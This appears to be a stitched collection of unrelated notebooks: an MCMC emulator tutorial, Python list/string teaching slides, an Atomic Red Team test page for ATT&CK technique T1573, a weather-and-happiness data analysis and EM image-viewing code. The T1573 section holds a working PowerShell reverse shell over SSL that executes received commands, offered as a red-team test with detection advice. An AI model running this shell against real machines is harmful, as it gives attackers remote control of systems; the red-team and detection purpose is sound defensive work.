When picking an MCMC sampling method to use, we have to keep in mind that it must allow for the starting positions of the MCMC walkers to be provided; and it must be able to use a custom log-posterior probability function.
As this is very common for most sampling methods, we will cover a few of the most popular MCMC sampling packages in Python in separate sections.
Because the emulator can be used in two different ways to speed up the parameter estimation process, we will explore three different samplers for each MCMC sampling package: *normal* (solely use normal sampling); *kick-started* (use normal sampling but start in plausible space); and *hybrid* (use normal sampling with added emulator prior).
By using these three different samplers, we can explore what the effect is of introducing an emulator to the MCMC sampling process.
So, for consistency, let's define their names here:
```
names = ["Normal", "Kick-Started", "Hybrid"]
```
Before continuing, please make sure that the appropriate package is installed before going to the related section.
Also, if you would like to see an example of a different sampling package in here, please open a [GitHub issue](https://github.com/1313e/PRISM/issues) about it (keep in mind that all requested packages must be `pip`-installable).
### emcee
Probably one of the most popular MCMC sampling packages in Python for quite some time now, is the [*emcee*](https://emcee.readthedocs.io/en/latest/) package.
For that reason, it would be weird to not include it here.
So, let's import the required definitions and see how we can use *emcee* to do hybrid sampling (we also call `get_walkers()` again to make sure any changes made previously are overridden):
```
from emcee import EnsembleSampler
n_walkers, p0_walkers, hybrid_lnpost = get_walkers(pipe, lnpost_fn=lnpost)
```
Now that we have the required class for doing the sampling, we can set up the three different samplers.
As the `EnsembleSampler` requires that the number of MCMC walkers is even, we will also have to make sure that this is the case (by duplicating all walkers if it is not):
```
# Duplicate all MCMC walkers if n_walkers is odd
if n_walkers % 2:
n_walkers *= 2
p0_walkers = np.concatenate([p0_walkers]*2)
# Generate some initial positions for the normal sampler
p0_walkers_n = lhd(n_sam=n_walkers,
n_val=modellink_obj._n_par,
val_rng=modellink_obj._par_rng)
# Create empty dict to hold the samplers
samplers = {}
# Define the three different samplers
# Add their initial positions and their initial model call counter
# Normal sampler
samplers[names[0]] = [p0_walkers_n, 0,
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=lnpost)]
# Kick-started sampler
samplers[names[1]] = [p0_walkers, sum(pipe.emulator.n_sam[1:]),
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=lnpost)]
# Hybrid sampler
samplers[names[2]] = [p0_walkers, sum(pipe.emulator.n_sam[1:]),
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=hybrid_lnpost)]
```
In the declaration of the three different entries for the `samplers` dict, we can easily see what the differences are between the samplers.
But, everything is now ready to do some (hybrid) sampling:
```
# Define number of MCMC iterations
n_iter = 50
# Loop over all samplers
for name, (p0, call_counter, sampler) in samplers.items():
# Run the sampler for n_iter iterations
sampler.run_mcmc(p0, n_iter)
# Make sure to save current values of p0 and call_counter for reruns
samplers[name][0] = sampler.chain[:, -1]
samplers[name][1] = call_counter
# Create a corner plot showing the results
fig = corner(xs=sampler.flatchain,
labels=modellink_obj._par_name,
show_titles=True,
truths=modellink_obj._par_est)
fig.suptitle("%s: $%s$ iterations, $%s$ evaluations, $%s$%% acceptance"
% (name, f2tex(sampler.iterations), f2tex(call_counter),
f2tex(np.average(sampler.acceptance_fraction*100))),
y=0.025)
plt.show()
```
From these three corner plots, we can learn a few things.
First of all, we can see that the parameter estimation accuracy of the normal sampler (first plot) is noticeably lower than that of the other two.
However, it also used fewer model evaluations (as shown by the title at the bottom of each plot).
The reason for this is that we added the initial number of model evaluations required for constructing the emulator as well, which is:
```
sum(pipe.emulator.n_sam[1:])
```
If we take this into account, then we see that the number of model evaluations used during the sampling process, is very similar for all three.
However, if we were to run the normal sampler for another *n_iter* iterations, this might change:
```
# Get variables for normal sampler
name = names[0]
p0, call_counter, sampler = samplers[name]
# Run the sampler for n_iter iterations
sampler.run_mcmc(p0, n_iter)
# Make sure to save current values of p0 and call_counter for reruns
samplers[name][0] = sampler.chain[:, -1]
samplers[name][1] = call_counter
# Create a corner plot showing the results
fig = corner(xs=sampler.flatchain,
labels=modellink_obj._par_name,
show_titles=True,
truths=modellink_obj._par_est)
fig.suptitle("%s: $%s$ iterations, $%s$ evaluations, $%s$%% acceptance"
% (name, f2tex(sampler.iterations), f2tex(call_counter),
f2tex(np.average(sampler.acceptance_fraction*100))),
y=0.025)
plt.show()
```
We can see here that the normal sampler has still not reached the same accuracy as the kick-started and hybrid samplers, even though now it used more model evaluations.
This shows how much of an impact skipping the burn-in phase has on the convergence speed of the sampling process, even when using a simple model like our single Gaussian.
Something that we can also note is that the kick-started and hybrid samplers have very, very similar results and accuracies.
This, again, shows the impact of skipping the burn-in phase.
However, it does seem that the hybrid sampler used fewer evaluations than the kick-started sampler, which is a result of the emulator steering the former in the right direction.
The effect for this simple model is very minor though, but can easily become much more important for more complex models.
### dynesty
Coming soon...
# Beginning Programming in Python
### Lists/Strings
#### CSE20 - Spring 2021
Interactive Slides: [https://tinyurl.com/cse20-spr21-lists-strings](https://tinyurl.com/cse20-spr21-lists-strings)
# Lists
- Commonly in programming we want to keep a collection of values rather than a single value.
- In Python, one way this can be done is by using `list`s
- A `list` can store between 0 and 9,223,372,036,854,775,807 items (though a list that large would probably crash your computer).
- A `list` can store values of different types.
- A `list` is a **mutable** collection, meaning we can change the contents of the list
- Typical naming convention for `list` variables is to name them in the plural, i.e. `items`, `values`, or `cars`
# Lists: Instantiation (Creation)
- There are a few ways to instantiate a list. The way we'll go over today is using square brackets `[]`
```
some_numbers = [1, 2, 3, 4]
some_letters = ["a", "b", "c"]
some_numbers_and_letters = [1, "b", 3]
empty_list = []
```
# Lists: Access
- To access/retrieve the values stored in a `list` variable we use square brackets `[]`
- To retrieve a single value we use an index (starting from the left 0, or from the right with -1), i.e. `list_variable[0]`
- To retrieve multiple items we use a `slice`. A `slice` is denoted using a colon `:`, and bounding indices can be placed on either side of the colon. Indices in `slice` notation are on a half closed interval where `list_variable[start:end]` operates on the interval `[start, end)`
- The contents of a list can be changed by assigning a new value at a index. `list_variable[idx] = new_value`
# Lists: Access
```
some_values = [1, "b", 3, "d"]
print(some_values[0])
print(some_values[-1])
print(some_values[1:])
print(some_values[:2])
print(some_values[1:3])
print(some_values[:])
```
# Lists: Updates
```
some_values = [1, "b", 3, "d"]
print(some_values)
some_values[0] = "a"
print(some_values)
some_values[0:2] = [1, 2]
print(some_values)
```
# `list` Methods
- `list`'s are considered `object`s, we'll go over `object`s in more detail when we go over Object Oriented Programming (OOP).
- For now you need to know that objects can have functions called `methods`, which can be "called" by using the `list_variable.method_name()` notation.
# `list` Methods: `append()`
- `append()` adds a value to the end of the `list`
```
some_values = []
some_values.append("Howdy")
print(some_values)
some_values.append("There")
print(some_values)
some_values.append("Friend")
print(some_values)
```
# `list` Methods: `pop()`
- `pop()` removes a value from the end of the `list`
```
some_values = ["Howdy", "There", "Friend"]
print(some_values)
last_item = some_values.pop()
print("some_values: ", some_values)
print("last_item: ", last_item)
```
# `list` Methods: `remove()`
- `remove()` removes the first value in the `list` that matches the given argument
```
some_values = ["Howdy", "There", "Friend"]
print(some_values)
some_values.remove("There")
print("some_values: ", some_values)
```
# `list` Methods: `index()`
- `index()` returns the "index" you would need to use to get the given argument.
```
some_values = ["Howdy", "There", "Friend"]
print(some_values)
friend_idx = some_values.index("Friend")
print("friend_idx: ", friend_idx)
print("some_values[friend_idx]: ", some_values[friend_idx])
```
# `list` Methods: `count()`
- `count()` returns the number of times a given argument occurs in a `list`
```
some_values = ["Howdy", "There", "Friend"]
print("Howdy occurs", some_values.count("Howdy"), "time(s)")
some_values.append("Howdy")
print("Howdy occurs", some_values.count("Howdy"), "time(s)")
print(some_values)
```
# `list` Methods: `reverse()`
- `reverse()` reverses the order of the elements in the list
```
some_values = ["Howdy", "There", "Friend", "Hello"]
print("some_values: ", some_values)
some_values.reverse()
print("some_values: ", some_values)
```
# `list` Methods: `extend()` or `+`
- `+`, like with strings, will concatenate two lists together
- `extend()` concatenates two lists, but does it "in-place". It's like using `+=` for concatenation.
```
some_values = ["Howdy", "There", "Friend"]
other_values = ["How", "Are", "You"]
concat = other_values + some_values
print(concat)
some_values.extend(other_values)
print(some_values)
some_values.extend(other_values)
print(some_values)
```
# Built-in Functions That are Compatible With `list`s
- `len()` will return the length (number of elements) of the `list`
- `max()` will return the maximum element in the list
- `min()` will return the minimum element in the list
- `sum()` will return the sum of all the elements in the list
# Built-in Functions That are Compatible With `list`s
```
some_values = [1, 2, 3, 4, 5]
print(some_values)
print("There are", len(some_values), "values in the list")
print("The largest value is", max(some_values))
print("The smallest value is", min(some_values))
print("The sum of the values in the list is", sum(some_values))
```
# Strings
- Strings are like a list of characters but are different in a couple important ways:
- They are **immutable** (can't be changed)
- They don't support methods that imply mutability like `pop()`, `extend()`, `reverse()`, etc.
- Some helpful methods not part of `list` include `.lower()` and `.upper()`
- `split()` can break a string into a list of strings, splitting the string based on the input argument
- More info in the string [documentation](https://docs.python.org/3/library/stdtypes.html#string-methods)
# Strings
```
class_name = "CSE20E40EABCjdfhsjkdfhkdjsfhskdjfhksjdhfkjlsdahf"
print(class_name[0])
print(class_name.index("E"))
print(class_name.count("2"))
print(class_name.lower())
print(class_name.split("h"))
```
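Because strings are immutable, trying to change one in place raises an error; a quick illustrative sketch:
```
greeting = "Howdy"
try:
    greeting[0] = "h"  # strings do not support item assignment
except TypeError as err:
    print("TypeError:", err)
greeting = "h" + greeting[1:]  # instead, build a new string
print(greeting)
```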
# Membership Operator `in` `not in`
- You can test whether or not a `list` or string contains a value by using `in` and `not in`
```
some_numbers = [1, 2, 3]
contains_one = 4 in some_numbers
print(contains_one)
class_name = "CSE20"
contains_cse = "C20" in class_name
print(contains_cse)
```
# What's Due Next?
- zybooks Chapter 3 due April 18th 11:59 PM
- Assignment 2 due April 25th 11:59 PM
# T1573 - Encrypted Channel
Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
## Atomic Tests
```
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force
```
### Atomic Test #1 - OpenSSL C2
Thanks to @OrOneEqualsOne for this quick C2 method.
This is to test to see if a C2 session can be established using an SSL socket.
More information about this technique, including how to set up the listener, can be found here:
https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443.
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$server_ip = '127.0.0.1'
$server_port = 443
$socket = New-Object Net.Sockets.TcpClient($server_ip, $server_port)
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
```
```
Invoke-AtomicTest T1573 -TestNumbers 1
```
## Detection
SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
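As an illustration of the "uncommon data flows" heuristic above, a small sketch follows (the flow-record format, field names, and the 50x ratio threshold are all assumptions for illustration):
```
# Flag flows where a client sends far more data than it receives (possible C2 upload/exfiltration).
flows = [
    {"src": "10.0.0.5", "dst": "203.0.113.7", "bytes_out": 52_000_000, "bytes_in": 40_000},
    {"src": "10.0.0.8", "dst": "198.51.100.2", "bytes_out": 120_000, "bytes_in": 3_500_000},
]
RATIO_THRESHOLD = 50  # assumed threshold: 50x more outbound than inbound is "uncommon"
for flow in flows:
    ratio = flow["bytes_out"] / max(flow["bytes_in"], 1)
    if ratio > RATIO_THRESHOLD:
        print(f"Review flow {flow['src']} -> {flow['dst']}: outbound/inbound ratio {ratio:.0f}x")
```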
## Shield Active Defense
### Protocol Decoder
Use software designed to deobfuscate or decrypt adversary command and control (C2) or data exfiltration traffic.
Protocol decoders are designed to read network traffic and contextualize all activity between the operator and the implant. These tools are often required to process complex encryption ciphers and custom protocols into a human-readable format for an analyst to interpret.
#### Opportunity
There is an opportunity to reveal data that the adversary has tried to protect from defenders
#### Use Case
Defenders can reverse engineer malware and develop protocol decoders that can decrypt and expose adversary communications
#### Procedures
Create and apply a decoder which allows you to view encrypted and/or encoded network traffic in a human-readable format.
# Weather and happiness
## Introduction
Using data from the 2020 world happiness report (retrieved from Wikipedia) as well as weather data from the OXCOVID-19 database, I look to answer the question "how does weather, as measured by average temperature, impact a country's happiness index?"
The effect of weather on happiness has received considerable study both at micro and macro levels. At a micro level research by Tsutsui (2013) on the happiness level of 75 students at Osaka university over a time period of 516 days found a quadratic relationship between happiness and temperature with happiness maximised at 13.98 C. This study is supported by similar findings that lower temperatures correlate with higher levels of wellbeing (and vice versa, assessed over summer) and that women are much more responsive than men to the weather (Connolly, 2013). Using data disaggregated at a local and individual level Brereton et al (2007) find that windspeed has a negative and significant correlation to personal wellbeing.
Larger studies include Rehdanz and Maddison (2005), who analyse the effects of climate on happiness across 67 countries, controlling for relevant socio-economic factors such as GDP per capita, and find that in warmer seasons people prefer colder average temperatures whilst in colder seasons people prefer warmer average temperatures. This alludes to variation in temperature playing a notable role in determining happiness.
The rationale supporting the use of the 2020 "World Happiness Report" (Helliwell, Layard, Sachs, & Neve, 2020) is that at the time of writing this was the most recent and comprehensive data set on "happiness" at a global level. This data is accessed via the Wikipedia page titled "World Happiness Report" (Wikipedia, 2020) due to the ease of accessing the data (via the Wikipedia API rather than copy/pasting data from the World Happiness Report PDF file), and as the page is classified with "Pending Changes Protection" there are some checks and balances before the data is changed, which helps ensure its accuracy. The index is calculated through a globally administered survey which asks respondents to rate their lives on a scale of 1 to 10 (10 being the best) and then averages this across the country (Wikipedia, 2020) (limitations of 'measuring' happiness are discussed further below).
The timeframe analysed is from January 01 to October 31 for the weather data from the OXCOVID-19 database, whilst the World Happiness Report 2020 gives the happiness index for every country averaged over the years 2017-2019. The key assumption that justifies this choice of data despite the temporal differences is that the weather has been relatively constant between 2019 and 2020. In addition to this, the COVID-19 pandemic has heavily impacted people's happiness at a global level, therefore it can be argued that last year's happiness level indicator would be the best estimate for this year's happiness index, setting aside the effect of COVID-19.
As this analysis is focused on happiness at a global level weather is considered at a country level. To account for the large variation in weather present in very large countries, the analysis is limited to countries with a land area less than 450,000 km^2. This allows for ~75% of the countries in the world to be considered.
```
try:
import seaborn as sns
if sns.__version__ == "0.11.0":
pass
else:
import sys
!{sys.executable} -m pip install --upgrade seaborn==0.11.0
except ModuleNotFoundError:
import sys
!{sys.executable} -m pip install seaborn==0.11.0
import seaborn as sns
print(sns.__version__ == "0.11.0")
import psycopg2
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
import matplotlib as mpl
#mpl.rcParams['figure.dpi'] = 200
import seaborn as sns
import numpy as np
import pandas as pd
import math
import datetime
from bs4 import BeautifulSoup
# Wikipedia API
import wikipedia
#wikipedia.set_lang("en")
# Load in happiness data
happiness_index_wikiObj = wikipedia.page("World Happiness Report", preload=True) #preload=True
happiness_index_html = happiness_index_wikiObj.html()
soup = BeautifulSoup(happiness_index_html, 'html.parser')
Happiness_index_2020_soup = soup.find('table',{'class':"wikitable"})
df_Happiness_2020 = pd.read_html(str(Happiness_index_2020_soup))
df_Happiness_2020 = pd.DataFrame(df_Happiness_2020[0])
# Load in weather data
conn = psycopg2.connect(
host='covid19db.org',
port=5432,
dbname='covid19',
user='covid19',
password='******')
cur = conn.cursor()
sql_command_1 = """SELECT date, country, countrycode, AVG(temperature_mean_avg) AS temperature_mean_avg
, AVG(sunshine_mean_avg) AS sunshine_mean_avg
FROM weather
WHERE date > '2019-12-31' AND date<'2020-11-01'
AND source= 'MET'
GROUP BY date, country, countrycode
"""
sql_command_2 = """ SELECT countrycode,value
FROM world_bank
WHERE indicator_name = 'Land area (sq. km)'
AND value<450000 AND year > 1960 """
df_weather = pd.read_sql(sql_command_1, conn)
df_LandSizes = pd.read_sql(sql_command_2, conn)
conn.close()
# Limit to countries with a landsize less than 450,000 (~75% of countries in the world)
df_weather = df_weather.merge(df_LandSizes,
how='inner',
on='countrycode')
assert df_weather.isna().sum().sum() == 0, "Null values present"
# Parse dates and convert temperature from Kelvin to Celsius (0 degrees C = 273.15 K)
df_weather['date'] = pd.to_datetime(df_weather['date'], format='%Y-%m-%d')
df_weather['temperature_mean_avg_C'] = df_weather['temperature_mean_avg'] - 273.15
df_weather_avg = df_weather[['date', 'countrycode', 'country', 'temperature_mean_avg_C']].groupby(['country']).mean()
df_weather_happy_country = df_Happiness_2020[['Score','Overall rank', 'Country or region']].merge(df_weather_avg
, how='inner'
, left_on='Country or region'
, right_on = 'country')
# Function to plot scatter plot of happiness vs temperature with line of best fit
def happiness_temperature_scatter(df):
sns.set_theme(style="whitegrid")
fig, ax1 = plt.subplots()
fig.set_dpi(150)
df.sort_values("temperature_mean_avg_C", inplace=True)
y=df["Score"]
x=df["temperature_mean_avg_C"]
    g = ax1.scatter(x, y, c=x, cmap='Spectral_r')
ax1.set_title('Figure 1: Average temperature and happiness score')
ax1.set_ylabel('Country happiness score')
    fig.colorbar(g, orientation='horizontal', pad=0.02, ticks=ax1.get_xticks(), anchor=(0, 0), panchor=(0.1, 0),
                 spacing='uniform', extendfrac='auto', fraction=0.07, label='Average Temperature (Degrees Celsius)')
ax1.set_xlabel(None)
ax1.set_xticklabels([None])
model2 = np.poly1d(np.polyfit(x, y, 1))
ax1.plot(x, model2(x))
df_weather['month'] = df_weather['date'].apply(lambda x: x.month_name())
df_weather_avg_2 = df_weather[['date', 'country', 'temperature_mean_avg_C','month']].groupby(['country','month']).mean()
df_weather_happy_country_month = df_Happiness_2020[['Score','Overall rank', 'Country or region']].merge(df_weather_avg_2
, how='inner'
, left_on='Country or region'
, right_on = 'country')
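# Note: the monthly frame has 10 rows (Jan-Oct) per country, so the first/last 100 rows below correspond to 10 countries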
top10_Countries = df_weather_happy_country_month.sort_values(by='Overall rank', ascending= True)[:100]
bottom10_Countries = df_weather_happy_country_month.sort_values('Overall rank', ascending= True)[-100:]
# Function to plot boxplot of 10 countries with the variation in weather
def happiness_tempvar_Hboxplot(df,plot_title):
sns.set_theme(style="ticks")
fig, ax1 = plt.subplots()
fig.set_dpi(150)
#fig.set_size_inches(3,2)
sns.boxplot(data=df, x="temperature_mean_avg_C", y="Country or region"
, whis=[0, 100], width=.7, palette="vlag")
sns.stripplot(data=df, x="temperature_mean_avg_C", y="Country or region"
, size=4, color=".3", linewidth=0)
ax1.xaxis.grid(True)
ax1.set(ylabel="Countries ordered by \n happiness score (Descending)")
ax1.set_title(plot_title)
    ax1.set_xlabel("Average temperature (Degrees Celsius)")
#print(dir(ax))
sns.despine(trim=False, left=False)
# Bucket countries into three average-temperature ranges
df_weather_happy_country['temp_range'] = df_weather_happy_country['temperature_mean_avg_C'].apply(
    lambda x: "Less than 15 degrees Celsius" if x < 15
    else "Greater than 20 degrees Celsius" if x > 20
    else "15 - 20 degrees Celsius")
# Function to plot scatter graph of average temperature and happiness divided between three temperature ranges
def hapiness_temp_3plots(df):
graph = sns.FacetGrid(df, col ='temp_range',legend_out=True,sharex=False)
graph.map(sns.regplot, "temperature_mean_avg_C", "Score").add_legend()
graph.fig.set_size_inches(15,5)
graph.fig.set_constrained_layout_pads(w_pad = 0.001, h_pad = 5.0/70.0 ,
hspace = 0.7, wspace = 0.7)
    graph.set_xlabels("Average temperature (Degrees Celsius)")
graph.set_ylabels("Happiness index")
graph.fig.set_dpi(300)
plt.show()
#hapiness_temp_3plots(df_weather_happy_country)
```
## Discussion
```
happiness_temperature_scatter(df_weather_happy_country)
```
The first section of the analysis concerns the relationship between temperature and happiness, as shown in Figure 1. In this graph, “average temperature” is calculated as the mean of the average daily temperature for each country from January to October. The graph shows a relatively strong negative relationship between a country's average temperature and its happiness score. This is in line with research indicating that people tend to be happier in countries with relatively colder weather; however, it does not suggest a quadratic relationship between weather and happiness maximised at roughly 14 °C as found by Tsutsui (2013). A possible reason is that Tsutsui's research focused on happiness and weather at a local, micro level, whereas this research has a global, macro focus.
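As a supplementary check on the quadratic claim, a linear and a quadratic polynomial can be fitted to the same country-level data and compared. This is only a sketch, assuming the `df_weather_happy_country` frame built above, and is not part of the original figures.
```
# Hypothetical check (not in the original analysis): linear vs quadratic fit of
# happiness on average temperature, using the frame built above.
x = df_weather_happy_country["temperature_mean_avg_C"].to_numpy()
y = df_weather_happy_country["Score"].to_numpy()

lin_coef = np.polyfit(x, y, 1)    # [slope, intercept]
quad_coef = np.polyfit(x, y, 2)   # [a, b, c] for a*x^2 + b*x + c

rss_lin = float(np.sum((y - np.polyval(lin_coef, x)) ** 2))
rss_quad = float(np.sum((y - np.polyval(quad_coef, x)) ** 2))
vertex = -quad_coef[1] / (2 * quad_coef[0])  # temperature at the quadratic's turning point

print(f"RSS linear: {rss_lin:.2f}, RSS quadratic: {rss_quad:.2f}")
print(f"Quadratic turning point: {vertex:.1f} degrees Celsius")
```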
A limitation of this analysis is that it does not consider the large seasonal swings in temperature experienced by countries with four distinct seasons. The following two charts take this into account, showing the within-year variation in temperature for the 10 happiest and 10 least happy countries.
```
happiness_tempvar_Hboxplot(top10_Countries,"Fig 2.1: Temperature range of top 10 happiest countries")
```
Figure 2.1 illustrates the temperature variation across the year for the 10 happiest countries. Specifically, the average daily temperature is averaged within each month from January to October, and the resulting monthly values are plotted as a horizontal boxplot for each country.
This figure shows that the “happiest” countries tend to have a very large range of temperatures across the year. For the majority of the countries considered here, the differences in average temperature may not be meaningful, as their interquartile ranges largely overlap. Furthermore, for most of these countries the average temperature falls within the range of 5 to 10 degrees Celsius.
```
happiness_tempvar_Hboxplot(bottom10_Countries,"Fig 2.2: Temperature range of top 10 least happy countries")
```
Figure 2.2 shows, conversely, the yearly temperature variation of the 10 least happy countries. This figure differs from Figure 2.1 in three ways. Firstly, the temperature variation within each country is much smaller, with all but one of the boxplots having 50% of their average monthly temperatures within a range of 5 degrees Celsius or less. Secondly, the countries tend not to overlap each other in average temperature: most have quite distinct average temperatures with little fluctuation. The final key difference is that each of these countries tends to be much warmer than the 10 happiest countries. This is a glaring difference, as the majority of the least happy countries have an average temperature above 20 degrees Celsius, whilst none of the happiest countries reach 20 degrees Celsius anywhere in their temperature range, including outlier months. In fact, all but one of the 10 happiest countries reach a temperature as high as 15 degrees Celsius within their interquartile range, suggesting a gap of around 5 degrees Celsius between the happiest and least happy countries.
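The interquartile-range claims above can also be checked numerically. The following is a rough sketch, assuming the `top10_Countries` and `bottom10_Countries` frames built earlier, and is not part of the original analysis.
```
# Hypothetical check (not in the original analysis): 25th/75th percentiles of monthly
# average temperature for each country in the two groups.
for name, frame in [("Happiest 10", top10_Countries), ("Least happy 10", bottom10_Countries)]:
    q = frame.groupby("Country or region")["temperature_mean_avg_C"].quantile([0.25, 0.75]).unstack()
    q["IQR_width"] = q[0.75] - q[0.25]
    print(name)
    print(q.round(1), "\n")
```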
```
hapiness_temp_3plots(df_weather_happy_country)
```
Figure 3 delves deeper into the relationship between average yearly temperature and the happiness index, segmented by temperature thresholds. The thresholds were chosen based on the previous pair of figures, which showed clear divisions in average temperature between the happiest and least happy countries: less than 15 degrees Celsius, 15 – 20 degrees Celsius, and greater than 20 degrees Celsius. The graphs show a negative relationship between average temperature and happiness for countries with an average temperature below 20 degrees Celsius, and this relationship is more pronounced among countries between 15 and 20 degrees Celsius. However, among countries with an average temperature above 20 degrees Celsius there appears to be no relationship between happiness and temperature, as shown by the largely horizontal line of best fit.
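To put a number on what the facet plots suggest, the slope of a simple linear fit of happiness on temperature can be computed within each range. Again, this is only a sketch using the `temp_range` column defined above, not part of the original analysis.
```
# Hypothetical check (not in the original analysis): per-range slope of happiness vs temperature.
for label, group in df_weather_happy_country.groupby("temp_range"):
    slope, intercept = np.polyfit(group["temperature_mean_avg_C"], group["Score"], 1)
    print(f"{label}: slope = {slope:.3f} happiness points per degree Celsius (n = {len(group)})")
```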
In conclusion, the key findings of this analysis are that, overall, people in countries with a lower average temperature tend to be happier, although this does not appear to hold for countries with an average temperature above 20 degrees Celsius. Additionally, people in countries with greater variability in temperature across the year tend to be happier.
# Limitations
A key limitation encountered in analysing the implications of various policies in response to COVID-19 is the discrepancy in data collection and definitions between countries. Measurements such as the number of confirmed cases are directly related to the amount of testing and the testing strategies employed by each country; similarly, the number of COVID-19-related deaths depends on how each country records deaths as related to COVID-19 in the presence of other comorbidities. Such variations in data collection limit the ability to compare COVID-19 outcomes across countries; an example is Tanzania, which stopped all public testing on 29th April. The scope of this analysis is therefore limited to being descriptive in nature, as quantifying the impact of specific policies would be both challenging and beyond its scope given the factors above.
A further challenge is presented by the definition of the “happiness index”. Happiness is a highly subjective variable, with its determinants varying substantially between regions and cultures. The perspective taken when constructing such an index risks being either so vague that it does not capture meaningful information, or so specific and biased towards one world-view that it does not provide a fair global comparison. Additionally, an index representing the happiness of an entire country may be misleading for countries with huge socio-economic disparities or several highly distinct cultures and peoples. Possible extensions to this analysis could compare weather and happiness across several different happiness indexes.
A further limitation of the temperature and happiness analysis is that temperature can vary greatly within a country. Although the countries considered were limited by size, a trade-off had to be made between how much in-country variation to allow (by including larger countries) and how broad a global scope the analysis could cover; the decision was made to prioritise global coverage, and therefore the smallest ~75% of countries were considered.
An overall limitation of descriptive analysis is that, although general correlations between variables can be identified, such analysis cannot determine causation. This was clear in part two: although a clear correlation was identified between average temperature and a country's happiness index, several other factors that influence happiness have not been considered, and there is no clear explanation of the mechanism by which temperature relates to happiness. Therefore, although descriptive analysis provides a good starting point for exploring the relationship between variables, it is not the final word.
```
from __future__ import print_function
import sys, os, math
import h5py
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
import seaborn as sns
sns.set_style('dark')
sns.set_context('talk')
from lightning import Lightning
# Load PyGreentea
# Relative path to where PyGreentea resides
pygt_path = '/groups/turaga/home/turagas/research/caffe_v1/PyGreentea'
sys.path.append(pygt_path)
import PyGreentea as pygt
cmap = matplotlib.colors.ListedColormap(np.vstack(((0,0,0),np.random.rand(255,3))))
# Load the datasets
raw_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/img_normalized.h5'
gt_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
aff_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_aff.h5'
testeu_h5_fname = 'test_out_0.h5'
test_h5_fname = 'test_out_0.h5'
raw_h5f = h5py.File(raw_h5_fname,'r')
gt_h5f = h5py.File(gt_h5_fname,'r')
aff_h5f = h5py.File(aff_h5_fname,'r')
testeu_h5f = h5py.File(testeu_h5_fname,'r')
test_h5f = h5py.File(test_h5_fname,'r')
raw = raw_h5f['main']
gt = gt_h5f['main']
aff = aff_h5f['main']
testeu = testeu_h5f['main']
test = test_h5f['main']
z=50; offset=44
plt.rcParams['figure.figsize'] = (18.0, 12.0)
raw_slc=np.transpose(np.squeeze(raw[z+offset,:,:]),(1,0));
gt_slc=np.transpose(np.squeeze(gt[z+offset,:,:]),(1,0))
aff_slc=np.transpose(np.squeeze(aff[:3,z+offset,:,:]),(2,1,0)).astype(float)
testeu_slc=np.transpose(np.squeeze(testeu[:3,z,:,:]),(2,1,0))
test_slc=np.transpose(np.squeeze(test[:3,z,:,:]),(2,1,0))
plt.rcParams['figure.figsize'] = (18.0, 12.0)
plt.subplot(2,3,1)
plt.axis('off')
plt.imshow(raw_slc,cmap=plt.cm.get_cmap('gray'))
plt.imshow(gt_slc,cmap=cmap,alpha=0.15);
plt.subplot(2,3,2)
plt.axis('off')
plt.imshow(gt_slc,cmap=cmap);
plt.subplot(2,3,3)
plt.axis('off')
plt.imshow(aff_slc,cmap=plt.cm.get_cmap('gray'));
plt.subplot(2,3,5)
plt.axis('off')
plt.imshow(testeu_slc,cmap=plt.cm.get_cmap('gray'));
plt.subplot(2,3,6)
plt.axis('off')
plt.imshow(test_slc,cmap=plt.cm.get_cmap('gray'));
plt.show()
# These are a set of functions to aid viewing of 3D EM images and their
# associated affinity graphs
import os
import matplotlib.cm as cm
import matplotlib
import numpy as np
from matplotlib.widgets import Slider, Button, RadioButtons
import matplotlib.pyplot as plt
import h5py
import array
#Displays three images: the raw data, the corresponding labels, and the predictions
def display(raw, label, seg, im_size=250, im2_size=432):
cmap = matplotlib.colors.ListedColormap(np.vstack(((0,0,0),np.random.rand(255,3))))
fig = plt.figure(figsize=(20,10))
fig.set_facecolor('white')
ax1,ax2,ax3 = fig.add_subplot(1,3,1),fig.add_subplot(1,3,2),fig.add_subplot(1,3,3)
fig.subplots_adjust(left=0.2, bottom=0.25)
depth0 = 0
